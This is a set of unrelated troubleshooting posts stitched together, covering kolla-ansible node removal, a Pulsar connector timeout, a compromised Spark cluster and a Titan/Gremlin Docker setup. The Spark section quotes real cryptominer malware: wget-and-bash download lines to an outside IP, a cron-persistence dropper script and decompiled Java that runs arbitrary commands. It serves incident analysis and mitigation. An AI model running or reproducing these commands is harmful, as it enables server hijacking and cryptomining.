I have an offline host node that serves as a compute, control, and storage node. The host was shut down by accident and cannot be brought back online. All services on that node show as down but still enabled, and I can't set them to disabled.
So I can't remove the host with:
kolla-ansible -i multinode stop --yes-i-really-really-mean-it --limit node-17
I get this error:
TASK [Gather facts] ********************************************************************************************************************************************************************************************************************
fatal: [node-17]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: connect to host node-17 port 22: Connection timed out", "unreachable": true}
PLAY RECAP *****************************************************************************************************************************************************************************************************************************
node-17 : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0
How can I remove that offline host node? Thanks.
PS: Why do I want to remove the offline host?
node-14 (online): **management node where kolla-ansible is installed**; also a compute, control, and storage node
node-15 (online): compute, control, and storage node
node-17 (offline): compute, control, and storage node
osc99 (being added): compute, control, and storage node
Because when I deploy the new host (osc99) with the following command (the node-17 line in the multinode inventory is commented out):
kolla-ansible -i multinode deploy --limit osc99
kolla-ansible reports this error:
TASK [keystone : include_tasks] ********************************************************************************************************************************************************************************************************
included: .../share/kolla-ansible/ansible/roles/keystone/tasks/init_fernet.yml for osc99
TASK [keystone : Waiting for Keystone SSH port to be UP] *******************************************************************************************************************************************************************************
ok: [osc99]
TASK [keystone : Initialise fernet key authentication] *********************************************************************************************************************************************************************************
ok: [osc99 -> node-14]
TASK [keystone : Run key distribution] *************************************************************************************************************************************************************************************************
fatal: [osc99 -> node-14]: FAILED! => {"changed": true, "cmd": ["docker", "exec", "-t", "keystone_fernet", "/usr/bin/fernet-push.sh"], "delta": "0:00:04.006900", "end": "2021-07-12 10:14:05.217609", "msg": "non-zero return code", "rc": 255, "start": "2021-07-12 10:14:01.210709", "stderr": "", "stderr_lines": [], "stdout": "Warning: Permanently added '[node.15]:8023' (ECDSA) to the list of known hosts.\r\r\nssh: connect to host node.17 port 8023: No route to host\r\r\nrsync: connection unexpectedly closed (0 bytes received so far) [sender]\r\nrsync error: unexplained error (code 255) at io.c(235) [sender=3.1.2]", "stdout_lines": ["Warning: Permanently added '[node.15]:8023' (ECDSA) to the list of known hosts.", "", "ssh: connect to host node.17 port 8023: No route to host", "", "rsync: connection unexpectedly closed (0 bytes received so far) [sender]", "rsync error: unexplained error (code 255) at io.c(235) [sender=3.1.2]"]}
NO MORE HOSTS LEFT *********************************************************************************************************************************************************************************************************************
PLAY RECAP *****************************************************************************************************************************************************************************************************************************
osc99 : ok=120 changed=55 unreachable=0 failed=1 skipped=31 rescued=0 ignored=1
How can I fix this error? This is the main blocker to removing the offline host.
Maybe I could fix it by changing the init_fernet.yml file:
node-14:~$ cat .../share/kolla-ansible/ansible/roles/keystone/tasks/init_fernet.yml
---
- name: Waiting for Keystone SSH port to be UP
  wait_for:
    host: "{{ api_interface_address }}"
    port: "{{ keystone_ssh_port }}"
    connect_timeout: 1
  register: check_keystone_ssh_port
  until: check_keystone_ssh_port is success
  retries: 10
  delay: 5

- name: Initialise fernet key authentication
  become: true
  command: "docker exec -t keystone_fernet kolla_keystone_bootstrap {{ keystone_username }} {{ keystone_groupname }}"
  register: fernet_create
  changed_when: fernet_create.stdout.find('localhost | SUCCESS => ') != -1 and (fernet_create.stdout.split('localhost | SUCCESS => ')[1]|from_json).changed
  until: fernet_create.stdout.split()[2] == 'SUCCESS' or fernet_create.stdout.find('Key repository is already initialized') != -1
  retries: 10
  delay: 5
  run_once: True
  delegate_to: "{{ groups['keystone'][0] }}"

- name: Run key distribution
  become: true
  command: docker exec -t keystone_fernet /usr/bin/fernet-push.sh
  run_once: True
  delegate_to: "{{ groups['keystone'][0] }}"
by changing delegate_to: "{{ groups['keystone'][0] }}"? But I haven't been able to implement that.
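A possible workaround (a hedged sketch, not verified against your deployment): the host list that fernet-push.sh rsyncs to was rendered into the existing keystone_fernet containers while node-17 was still in the inventory, so deploying with --limit osc99 never refreshes it. With node-17 commented out of the multinode inventory, regenerating the Keystone configuration on the remaining hosts before deploying the new one should drop node-17 from that list; the --tags option is assumed to be available in your kolla-ansible version.

# node-17 is already commented out of the multinode inventory at this point.
# Re-render the Keystone config (and the fernet-push.sh host list) on the surviving hosts:
kolla-ansible -i multinode reconfigure --tags keystone
# Then retry deploying the new host:
kolla-ansible -i multinode deploy --limit osc99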
I'm trying to run a Pulsar DebeziumPostgresSource connector.
This is the command I'm running:
bin/pulsar-admin \
--admin-url https://localhost:8443 \
--auth-plugin org.apache.pulsar.client.impl.auth.AuthenticationToken \
--auth-params file:///pulsar/tokens/broker/token \
--tls-allow-insecure \
source localrun \
--broker-service-url pulsar+ssl://my-pulsar-server:6651 \
--client-auth-plugin org.apache.pulsar.client.impl.auth.AuthenticationToken \
--client-auth-params file:///pulsar/tokens/broker/token \
--tls-allow-insecure \
--source-config-file /pulsar/debezium-config/my-source-config.yaml
Here's the /pulsar/debezium-config/my-source-config.yaml file:
tenant: my-tenant
namespace: my-namespace
name: my-source
topicName: my-topic
archive: connectors/pulsar-io-debezium-postgres-2.6.0-SNAPSHOT.nar
parallelism: 1
configs:
plugin.name: pgoutput
database.hostname: my-db-server
database.port: "5432"
database.user: my-db-user
database.password: my-db-password
database.dbname: my-db
database.server.name: my-db-server-name
table.whitelist: my_schema.my_table
pulsar.service.url: pulsar+ssl://my-pulsar-server:6651/
And here's the output from the command above:
11:47:29.924 [main] INFO org.apache.pulsar.functions.runtime.RuntimeSpawner - my-tenant/my-namespace/my-source-0 RuntimeSpawner starting function
11:47:29.925 [main] INFO org.apache.pulsar.functions.runtime.thread.ThreadRuntime - ThreadContainer starting function with instance config InstanceConfig(instanceId=0, functionId=4073a1d9-1312-4570-981b-6723626e394a, functionVersion=01d5a3a7-c6d7-4f79-8717-403ad1371411, functionDetails=tenant: "my-tenant"
namespace: "my-namespace"
name: "my-source"
className: "org.apache.pulsar.functions.api.utils.IdentityFunction"
autoAck: true
parallelism: 1
source {
className: "org.apache.pulsar.io.debezium.postgres.DebeziumPostgresSource"
configs: "{\"database.user\":\"my-db-user\",\"database.dbname\":\"my-db\",\"database.hostname\":\"my-db-server\",\"database.password\":\"my-db-password\",\"database.server.name\":\"my-db-server-name\",\"plugin.name\":\"pgoutput\",\"database.port\":\"5432\",\"pulsar.service.url\":\"pulsar+ssl://my-pulsar-server:6651/\",\"table.whitelist\":\"my_schema.my_table\"}"
typeClassName: "org.apache.pulsar.common.schema.KeyValue"
}
sink {
topic: "my-topic"
typeClassName: "org.apache.pulsar.common.schema.KeyValue"
}
resources {
cpu: 1.0
ram: 1073741824
disk: 10737418240
}
componentType: SOURCE
, maxBufferedTuples=1024, functionAuthenticationSpec=null, port=39135, clusterName=local, maxPendingAsyncRequests=1000)
11:47:32.552 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ConnectionPool - [[id: 0xf8ffbf24, L:/redacted-ip-l:43802 - R:my-pulsar-server/redacted-ip-r:6651]] Connected to server
11:47:33.240 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ProducerStatsRecorderImpl - Starting Pulsar producer perf with config: {
"topicName" : "my-topic",
"producerName" : null,
"sendTimeoutMs" : 0,
"blockIfQueueFull" : true,
"maxPendingMessages" : 1000,
"maxPendingMessagesAcrossPartitions" : 50000,
"messageRoutingMode" : "CustomPartition",
"hashingScheme" : "Murmur3_32Hash",
"cryptoFailureAction" : "FAIL",
"batchingMaxPublishDelayMicros" : 10000,
"batchingPartitionSwitchFrequencyByPublishDelay" : 10,
"batchingMaxMessages" : 1000,
"batchingMaxBytes" : 131072,
"batchingEnabled" : true,
"chunkingEnabled" : false,
"compressionType" : "LZ4",
"initialSequenceId" : null,
"autoUpdatePartitions" : true,
"multiSchema" : true,
"properties" : {
"application" : "pulsar-source",
"id" : "my-tenant/my-namespace/my-source",
"instance_id" : "0"
}
}
11:47:33.259 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ProducerStatsRecorderImpl - Pulsar client config: {
"serviceUrl" : "pulsar+ssl://my-pulsar-server:6651",
"authPluginClassName" : "org.apache.pulsar.client.impl.auth.AuthenticationToken",
"authParams" : "file:///pulsar/tokens/broker/token",
"authParamMap" : null,
"operationTimeoutMs" : 30000,
"statsIntervalSeconds" : 60,
"numIoThreads" : 1,
"numListenerThreads" : 1,
"connectionsPerBroker" : 1,
"useTcpNoDelay" : true,
"useTls" : true,
"tlsTrustCertsFilePath" : null,
"tlsAllowInsecureConnection" : true,
"tlsHostnameVerificationEnable" : false,
"concurrentLookupRequest" : 5000,
"maxLookupRequest" : 50000,
"maxLookupRedirects" : 20,
"maxNumberOfRejectedRequestPerConnection" : 50,
"keepAliveIntervalSeconds" : 30,
"connectionTimeoutMs" : 10000,
"requestTimeoutMs" : 60000,
"initialBackoffIntervalNanos" : 100000000,
"maxBackoffIntervalNanos" : 60000000000,
"listenerName" : null,
"useKeyStoreTls" : false,
"sslProvider" : null,
"tlsTrustStoreType" : "JKS",
"tlsTrustStorePath" : null,
"tlsTrustStorePassword" : null,
"tlsCiphers" : [ ],
"tlsProtocols" : [ ],
"proxyServiceUrl" : null,
"proxyProtocol" : null
}
11:47:33.418 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ConnectionPool - [[id: 0xab39f703, L:/redacted-ip-l:43806 - R:my-pulsar-server/redacted-ip-r:6651]] Connected to server
11:47:33.422 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ClientCnx - [id: 0xab39f703, L:/redacted-ip-l:43806 - R:my-pulsar-server/redacted-ip-r:6651] Connected through proxy to target broker at my-broker:6651
11:47:33.484 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ProducerImpl - [my-topic] [null] Creating producer on cnx [id: 0xab39f703, L:/redacted-ip-l:43806 - R:my-pulsar-server/redacted-ip-r:6651]
11:48:33.434 [pulsar-client-io-1-1] ERROR org.apache.pulsar.client.impl.ProducerImpl - [my-topic] [null] Failed to create producer: 3 lookup request timedout after ms 30000
11:48:33.438 [pulsar-client-io-1-1] WARN org.apache.pulsar.client.impl.ClientCnx - [id: 0xab39f703, L:/redacted-ip-l:43806 - R:my-pulsar-server/redacted-ip-r:6651] request 3 timed out after 30000 ms
11:48:33.629 [main] INFO org.apache.pulsar.functions.LocalRunner - RuntimeSpawner quit because of
java.lang.RuntimeException: org.apache.pulsar.client.api.PulsarClientException$TimeoutException: 3 lookup request timedout after ms 30000
at org.apache.pulsar.functions.sink.PulsarSink$PulsarSinkAtMostOnceProcessor.<init>(PulsarSink.java:177) ~[org.apache.pulsar-pulsar-functions-instance-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
at org.apache.pulsar.functions.sink.PulsarSink$PulsarSinkAtLeastOnceProcessor.<init>(PulsarSink.java:206) ~[org.apache.pulsar-pulsar-functions-instance-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
at org.apache.pulsar.functions.sink.PulsarSink.open(PulsarSink.java:284) ~[org.apache.pulsar-pulsar-functions-instance-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
at org.apache.pulsar.functions.instance.JavaInstanceRunnable.setupOutput(JavaInstanceRunnable.java:819) ~[org.apache.pulsar-pulsar-functions-instance-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
at org.apache.pulsar.functions.instance.JavaInstanceRunnable.setup(JavaInstanceRunnable.java:224) ~[org.apache.pulsar-pulsar-functions-instance-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
at org.apache.pulsar.functions.instance.JavaInstanceRunnable.run(JavaInstanceRunnable.java:246) ~[org.apache.pulsar-pulsar-functions-instance-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
at java.lang.Thread.run(Thread.java:748) ~[?:1.8.0_252]
Caused by: org.apache.pulsar.client.api.PulsarClientException$TimeoutException: 3 lookup request timedout after ms 30000
at org.apache.pulsar.client.api.PulsarClientException.unwrap(PulsarClientException.java:821) ~[org.apache.pulsar-pulsar-client-api-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
at org.apache.pulsar.client.impl.ProducerBuilderImpl.create(ProducerBuilderImpl.java:93) ~[org.apache.pulsar-pulsar-client-original-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
at org.apache.pulsar.functions.sink.PulsarSink$PulsarSinkProcessorBase.createProducer(PulsarSink.java:106) ~[org.apache.pulsar-pulsar-functions-instance-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
at org.apache.pulsar.functions.sink.PulsarSink$PulsarSinkAtMostOnceProcessor.<init>(PulsarSink.java:174) ~[org.apache.pulsar-pulsar-functions-instance-2.6.0-SNAPSHOT.jar:2.6.0-SNAPSHOT]
... 6 more
11:48:59.956 [function-timer-thread-5-1] ERROR org.apache.pulsar.functions.runtime.RuntimeSpawner - my-tenant/my-namespace/my-source-java.lang.RuntimeException: org.apache.pulsar.client.api.PulsarClientException$TimeoutException: 3 lookup request timedout after ms 30000 Function Container is dead with exception.. restarting
As you can see, it failed to create a producer due to a TimeoutException. What are the likely causes of this error? What's the best way to further investigate this issue?
Additional info:
I have also tried the --tls-trust-cert-path /my/ca-certificates.crt option instead of --tls-allow-insecure, but got the same error.
I am able to list tenants:
bin/pulsar-admin \
--admin-url https://localhost:8443 \
--auth-plugin org.apache.pulsar.client.impl.auth.AuthenticationToken \
--auth-params file:///pulsar/tokens/broker/token \
tenants list
# Output:
# "public"
# "pulsar"
# "my-topic"
But I am not able to get an OK broker health-check:
bin/pulsar-admin \
--admin-url https://localhost:8443 \
--auth-plugin org.apache.pulsar.client.impl.auth.AuthenticationToken \
--auth-params file:///pulsar/tokens/broker/token \
brokers healthcheck
# Output:
# null
# Reason: java.util.concurrent.TimeoutException
bin/pulsar-admin \
--admin-url https://localhost:8443 \
--auth-plugin org.apache.pulsar.client.impl.auth.AuthenticationToken \
--auth-params file:///pulsar/tokens/broker/token \
--tls-allow-insecure \
brokers healthcheck
# Output:
# HTTP 500 Internal Server Error
# Reason: HTTP 500 Internal Server Error
In my case, the root cause was an expired TLS certificate.
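For anyone hitting the same timeout, a quick way to check whether the broker or proxy certificate has expired (the hostname and port below are the placeholders used in this question):

echo | openssl s_client -connect my-pulsar-server:6651 -servername my-pulsar-server 2>/dev/null | openssl x509 -noout -dates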
After a lot of searching and research, I've turned here for help.
The problem is that once a Spark cluster is built (one master and four workers with different IP addresses), drivers are constantly being submitted to it. From the web UI, I can see a class named "Exploit" submitted with each driver.
Below are the head and tail of the log file from one worker.
Launch Command: "/usr/lib/jvm/jdk1.8/jre/bin/java" "-cp" "/home/labuser/spark/conf/:/home/labuser/spark/jars/*" "-Xmx1024M" "-Dspark.eventLog.enabled=true" "-Dspark.driver.supervise=false" "-Dspark.submit.deployMode=cluster" "-Dspark.app.name=Exploit" "-Dspark.jars=http://192.99.142.226:8220/Exploit.jar" "-Dspark.master=spark://129.10.58.200:7077" "org.apache.spark.deploy.worker.DriverWrapper" "spark://Worker#129.10.58.202:44717" "/home/labuser/spark/work/driver-20180815111311-0065/Exploit.jar" "Exploit" "wget -O /var/tmp/a.sh http://192.99.142.248:8220/cron5.sh,bash /var/tmp/a.sh
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.allocator.type: unpooled
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.threadLocalDirectBufferSize: 65536
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.maxThreadLocalCharBufferSize: 16384
18/08/15 11:13:56 DEBUG NetUtil: Loopback interface: lo (lo, 0:0:0:0:0:0:0:1%lo)
18/08/15 11:13:56 DEBUG NetUtil: /proc/sys/net/core/somaxconn: 128
18/08/15 11:13:57 DEBUG TransportServer: Shuffle server started on port: 46034
18/08/15 11:13:57 INFO Utils: Successfully started service 'Driver' on port 46034.
18/08/15 11:13:57 INFO WorkerWatcher: Connecting to worker spark://Worker#129.10.58.202:44717
18/08/15 11:13:58 DEBUG TransportClientFactory: Creating new connection to /129.10.58.202:44717
18/08/15 11:13:59 DEBUG AbstractByteBuf: -Dio.netty.buffer.bytebuf.checkAccessible: true
18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.level: simple
18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.maxRecords: 4
18/08/15 11:13:59 DEBUG ResourceLeakDetectorFactory: Loaded default ResourceLeakDetector: io.netty.util.ResourceLeakDetector#350d33b5
18/08/15 11:14:00 DEBUG TransportClientFactory: Connection to /129.10.58.202:44717 successful, running bootstraps...
18/08/15 11:14:00 INFO TransportClientFactory: Successfully created connection to /129.10.58.202:44717 after 1706 ms (0 ms spent in bootstraps)
18/08/15 11:14:00 INFO WorkerWatcher: Successfully connected to spark://Worker#129.10.58.202:44717
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxCapacity.default: 32768
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxSharedCapacityFactor: 2
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.linkCapacity: 16
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.ratio: 8
I found that there is an "Exploit" program that hacks Spark clusters by taking advantage of the fact that anyone can submit applications to an unsecured Spark cluster:
ARBITRARY CODE EXECUTION IN UNSECURED APACHE SPARK CLUSTER
But I don't think my cluster has been hacked, because the problem still exists even after enabling authentication.
My question is: has anyone else had this problem? And why does this happen?
THIS IS VERY ALARMING!
First, the decompiled source code shows that the driver will execute any commands supplied to it via its arguments. In your case, that is a wget that downloads the script to /var/tmp and then executes it.
The downloaded script fetches a .jpg and pipes it to bash. THIS IS NOT AN IMAGE:
wget -q -O - http://192.99.142.248:8220/logo10.jpg | bash -sh
logo10.jpg installs a cron job that pulls down even more code to run on your cluster. You are probably seeing this job being submitted because it is started as a scheduled cron job.
#!/bin/sh
ps aux | grep -vw sustes | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w sustes |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
wget -O /var/tmp/config.json http://192.99.142.248:8220/3.json
wget -O /var/tmp/sustes http://192.99.142.248:8220/rig
chmod 777 /var/tmp/sustes
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sustes -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."
Decompiled Source
public class Exploit {
    public Exploit() {
    }

    public static void main(String[] var0) throws Exception {
        String[] var1 = var0[0].split(",");
        String[] var2 = var1;
        int var3 = var1.length;

        for(int var4 = 0; var4 < var3; ++var4) {
            String var5 = var2[var4];
            System.out.println(var5);
            System.out.println(executeCommand(var5.trim()));
            System.out.println("==============================================");
        }
    }

    private static String executeCommand(String var0) {
        StringBuilder var1 = new StringBuilder();

        try {
            Process var2 = Runtime.getRuntime().exec(var0);
            var2.waitFor();
            BufferedReader var3 = new BufferedReader(new InputStreamReader(var2.getInputStream()));

            String var4;
            while((var4 = var3.readLine()) != null) {
                var1.append(var4).append("\n");
            }
        } catch (Exception var5) {
            var5.printStackTrace();
        }

        return var1.toString();
    }
}
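As a general mitigation (a hedged sketch, not something taken from the decompiled code): these campaigns abuse the standalone master's open submission ports, so restricting who can reach ports 7077 and 6066 and disabling the unauthenticated REST submission gateway usually stops the constant driver submissions. The property names below assume Spark 2.x, and the 129.10.58.0/24 subnet is only an example based on the addresses in the question.

# conf/spark-defaults.conf
#   spark.master.rest.enabled  false
#   spark.authenticate         true
#   spark.authenticate.secret  <shared-secret>

# Firewall the master's submission ports from untrusted networks (example subnet):
iptables -A INPUT -p tcp --dport 7077 ! -s 129.10.58.0/24 -j DROP
iptables -A INPUT -p tcp --dport 6066 ! -s 129.10.58.0/24 -j DROP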
Abstract
I'm trying to set up a Titan/Cassandra/Gremlin-Server stack in Docker (v1.13.0). The problem I'm facing is that applications trying to connect to Gremlin-Server on the default port 8182 are reporting errors (details below).
First, here is some relevant version information:
Cassandra v2.2.8
Titan v1.0.0 (Hadoop 1)
Gremlin 3.2.3
Setup
Setup takes place in a Dockerfile in order to be reproducible. It assumes that a Cassandra container already exists, running a cassandra.yaml in which start_rpc has been set to true.
The Dockerfile is as follows:
FROM openjdk:alpine
ENV TITAN 'titan-1.0.0-hadoop1'
RUN apk update && apk add bash unzip && rm -rf /var/cache/apk/* \
&& adduser -S -s /bin/bash -D srg \
&& wget -O /tmp/$TITAN.zip http://s3.thinkaurelius.com/downloads/titan/$TITAN.zip \
&& unzip /tmp/$TITAN.zip -d /opt && ln -s /opt/$TITAN /opt/titan \
&& rm /tmp/*.zip \
&& chown -R srg /opt/$TITAN/ \
&& /opt/titan/bin/gremlin-server.sh -i org.apache.tinkerpop gremlin-python 3.2.3
COPY conf/gremlin-server/* /opt/$TITAN/conf/gremlin-server/
USER srg
WORKDIR /opt/titan
EXPOSE 8182
CMD ["bin/gremlin-server.sh", "conf/gremlin-server/srg.yaml"]
The astute reader will note that I am copying custom configuration files into the container, namely a Gremlin-Server configuration file (srg.yaml) and a titan graph properties file (srg.properties).
srg.yaml
host: localhost
port: 8182
threadPoolWorker: 1
gremlinPool: 8
scriptEvaluationTimeout: 30000
serializedResponseTimeout: 30000
channelizer: org.apache.tinkerpop.gremlin.server.channel.WebSocketChannelizer
graphs: {
  graph: conf/gremlin-server/srg.properties
}
plugins:
  - aurelius.titan
scriptEngines: {
  gremlin-groovy: {
    imports: [java.lang.Math],
    staticImports: [java.lang.Math.PI],
    scripts: [scripts/empty-sample.groovy]},
  gremlin-jython: {},
  gremlin-python: {},
  nashorn: {
    imports: [java.lang.Math],
    staticImports: [java.lang.Math.PI]}}
serializers:
  - { className: org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0, config: { useMapperFromGraph: graph }}
  - { className: org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0, config: { serializeResultToString: true }}
  - { className: org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerGremlinV1d0, config: { useMapperFromGraph: graph }}
  - { className: org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV1d0, config: { useMapperFromGraph: graph }}
processors:
  - { className: org.apache.tinkerpop.gremlin.server.op.session.SessionOpProcessor, config: { sessionTimeout: 28800000 }}
metrics: {
  consoleReporter: {enabled: true, interval: 180000},
  csvReporter: {enabled: true, interval: 180000, fileName: /tmp/gremlin-server-metrics.csv},
  jmxReporter: {enabled: true},
  slf4jReporter: {enabled: true, interval: 180000},
  gangliaReporter: {enabled: false, interval: 180000, addressingMode: MULTICAST},
  graphiteReporter: {enabled: false, interval: 180000}}
threadPoolBoss: 1
maxInitialLineLength: 4096
maxHeaderSize: 8192
maxChunkSize: 8192
maxContentLength: 65536
maxAccumulationBufferComponents: 1024
resultIterationBatchSize: 64
writeBufferLowWaterMark: 32768
writeBufferHighWaterMark: 65536
ssl: {
  enabled: false}
srg.properties
gremlin.graph=com.thinkaurelius.titan.core.TitanFactory
storage.backend=cassandrathrift
storage.hostname=cassandra # refers to the linked container
cache.db-cache = true
cache.db-cache-clean-wait = 20
cache.db-cache-time = 180000
cache.db-cache-size = 0.25
# Start elasticsearch inside the Titan JVM
index.search.backend=elasticsearch
index.search.directory=db/es
index.search.elasticsearch.client-only=false
index.search.elasticsearch.local-mode=true
Execution
The container is run with the following command: docker run -ti --rm=true --link test.cassandra:cassandra -p 8182:8182 titan.
Here is the log output for Gremlin-Server:
0 [main] INFO org.apache.tinkerpop.gremlin.server.GremlinServer -
\,,,/
(o o)
-----oOOo-(3)-oOOo-----
297 [main] INFO org.apache.tinkerpop.gremlin.server.GremlinServer - Configuring Gremlin Server from conf/gremlin-server/srg.yaml
439 [main] INFO org.apache.tinkerpop.gremlin.server.util.MetricManager - Configured Metrics ConsoleReporter configured with report interval=180000ms
448 [main] INFO org.apache.tinkerpop.gremlin.server.util.MetricManager - Configured Metrics CsvReporter configured with report interval=180000ms to fileName=/tmp/gremlin-server-metrics.csv
557 [main] INFO org.apache.tinkerpop.gremlin.server.util.MetricManager - Configured Metrics JmxReporter configured with domain= and agentId=
561 [main] INFO org.apache.tinkerpop.gremlin.server.util.MetricManager - Configured Metrics Slf4jReporter configured with interval=180000ms and loggerName=org.apache.tinkerpop.gremlin.server.Settings$Slf4jReporterMetrics
1750 [main] INFO com.thinkaurelius.titan.core.util.ReflectiveConfigOptionLoader - Loaded and initialized config classes: 12 OK out of 12 attempts in PT0.148S
1972 [main] INFO com.thinkaurelius.titan.diskstorage.cassandra.thrift.CassandraThriftStoreManager - Closed Thrift connection pooler.
1990 [main] INFO com.thinkaurelius.titan.graphdb.configuration.GraphDatabaseConfiguration - Generated unique-instance-id=ac1100031-ad2d5ffa52e81
2026 [main] INFO com.thinkaurelius.titan.diskstorage.Backend - Configuring index [search]
2386 [main] INFO org.elasticsearch.node - [Lunatik] version[1.5.1], pid[1], build[5e38401/2015-04-09T13:41:35Z]
2387 [main] INFO org.elasticsearch.node - [Lunatik] initializing ...
2399 [main] INFO org.elasticsearch.plugins - [Lunatik] loaded [], sites []
6471 [main] INFO org.elasticsearch.node - [Lunatik] initialized
6472 [main] INFO org.elasticsearch.node - [Lunatik] starting ...
6477 [main] INFO org.elasticsearch.transport - [Lunatik] bound_address {local[1]}, publish_address {local[1]}
6507 [main] INFO org.elasticsearch.discovery - [Lunatik] elasticsearch/u2StmRW1RsyEHw561yoNFw
6519 [elasticsearch[Lunatik][clusterService#updateTask][T#1]] INFO org.elasticsearch.cluster.service - [Lunatik] master {new [Lunatik][u2StmRW1RsyEHw561yoNFw][ad2d5ffa52e8][local[1]]{local=true}}, removed {[Lunatik][kKyL9UE-R123LLZTTrsVCw][ad2d5ffa52e8][local[1]]{local=true},}, reason: local-disco-initial_connect(master)
6908 [main] INFO org.elasticsearch.http - [Lunatik] bound_address {inet[/0:0:0:0:0:0:0:0:9200]}, publish_address {inet[/172.17.0.3:9200]}
6909 [main] INFO org.elasticsearch.node - [Lunatik] started
6923 [elasticsearch[Lunatik][clusterService#updateTask][T#1]] INFO org.elasticsearch.gateway - [Lunatik] recovered [0] indices into cluster_state
7486 [elasticsearch[Lunatik][clusterService#updateTask][T#1]] INFO org.elasticsearch.cluster.metadata - [Lunatik] [titan] creating index, cause [api], templates [], shards [5]/[1], mappings []
8075 [main] INFO com.thinkaurelius.titan.diskstorage.Backend - Initiated backend operations thread pool of size 4
8241 [main] INFO com.thinkaurelius.titan.diskstorage.Backend - Configuring total store cache size: 94787290
8641 [main] INFO com.thinkaurelius.titan.diskstorage.log.kcvs.KCVSLog - Loaded unidentified ReadMarker start time 2017-01-21T16:31:28.750Z into com.thinkaurelius.titan.diskstorage.log.kcvs.KCVSLog$MessagePuller#3520958b
8642 [main] INFO org.apache.tinkerpop.gremlin.server.GremlinServer - Graph [graph] was successfully configured via [conf/gremlin-server/srg.properties].
8643 [main] INFO org.apache.tinkerpop.gremlin.server.util.ServerGremlinExecutor - Initialized Gremlin thread pool. Threads in pool named with pattern gremlin-*
14187 [main] INFO com.jcabi.manifests.Manifests - 108 attributes loaded from 264 stream(s) in 185ms, 108 saved, 3371 ignored: ["Agent-Class", "Ant-Version", "Archiver-Version", "Bnd-LastModified", "Boot-Class-Path", "Build-Date", "Build-Host", "Build-Id", "Build-Java-Version", "Build-Jdk", "Build-Job", "Build-Number", "Build-Time", "Build-Timestamp", "Build-Version", "Built-At", "Built-By", "Built-OS", "Built-On", "Built-Status", "Bundle-ActivationPolicy", "Bundle-Activator", "Bundle-BuddyPolicy", "Bundle-Category", "Bundle-ClassPath", "Bundle-Classpath", "Bundle-Copyright", "Bundle-Description", "Bundle-DocURL", "Bundle-License", "Bundle-Localization", "Bundle-ManifestVersion", "Bundle-Name", "Bundle-NativeCode", "Bundle-RequiredExecutionEnvironment", "Bundle-SymbolicName", "Bundle-Vendor", "Bundle-Version", "Can-Redefine-Classes", "Change", "Class-Path", "Created-By", "DynamicImport-Package", "Eclipse-AutoStart", "Eclipse-BuddyPolicy", "Eclipse-SourceReferences", "Embed-Dependency", "Embedded-Artifacts", "Export-Package", "Extension-Name", "Extension-name", "Fragment-Host", "Git-Commit-Branch", "Git-Commit-Date", "Git-Commit-Hash", "Git-Committer-Email", "Git-Committer-Name", "Gradle-Version", "Gremlin-Lib-Paths", "Gremlin-Plugin-Dependencies", "Gremlin-Plugin-Paths", "Ignore-Package", "Implementation-Build", "Implementation-Build-Date", "Implementation-Title", "Implementation-URL", "Implementation-Vendor", "Implementation-Vendor-Id", "Implementation-Version", "Import-Package", "Include-Resource", "JCabi-Build", "JCabi-Date", "JCabi-Version", "Java-Vendor", "Java-Version", "Main-Class", "Main-class", "Manifest-Version", "Maven-Version", "Module-Email", "Module-Origin", "Module-Owner", "Module-Source", "Originally-Created-By", "Os-Arch", "Os-Name", "Os-Version", "Package", "Premain-Class", "Private-Package", "Require-Bundle", "Require-Capability", "Scm-Connection", "Scm-Revision", "Scm-Url", "Specification-Title", "Specification-Vendor", "Specification-Version", "Tool", "X-Compile-Source-JDK", "X-Compile-Target-JDK", "hash", "implementation-version", "mode", "package", "url", "version"]
14842 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.ScriptEngines - Loaded gremlin-jython ScriptEngine
15540 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.ScriptEngines - Loaded nashorn ScriptEngine
16076 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.ScriptEngines - Loaded gremlin-python ScriptEngine
